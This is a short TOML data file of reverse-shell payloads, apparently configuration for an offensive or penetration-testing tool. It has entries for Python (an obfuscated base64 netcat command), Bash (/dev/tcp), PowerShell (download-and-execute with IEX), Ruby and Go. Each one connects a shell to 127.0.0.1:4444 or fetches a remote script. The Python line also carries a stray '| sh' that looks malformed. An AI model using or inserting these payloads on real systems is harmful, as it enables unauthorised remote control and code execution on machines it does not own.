[[payloads]]
language = "python"
import_statement = "import os,base64"
command = "os.system(base64.b64decode('bmMgLWUgL2Jpbi9iYXNoIDEyNy4wLjAuMSA0NDQ0').decode()) | sh"

[[payloads]]
language = "bash"
import_statement = ""
command = "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"

[[payloads]]
language = "powershell"
import_statement = ""
command = "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/shell.ps1')"

[[payloads]]
language = "ruby"
import_statement = "require 'socket'"
command = "exit if fork;c=TCPSocket.new('127.0.0.1','4444');while(l=c.gets);IO.popen(l,'r'){|io|c.print io.read}end"

[[payloads]]
language = "go"
import_statement = "import (\"net\";\"os/exec\")"
command = "c,_:=net.Dial(\"tcp\",\"127.0.0.1:4444\");cmd:=exec.Command(\"/bin/sh\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()"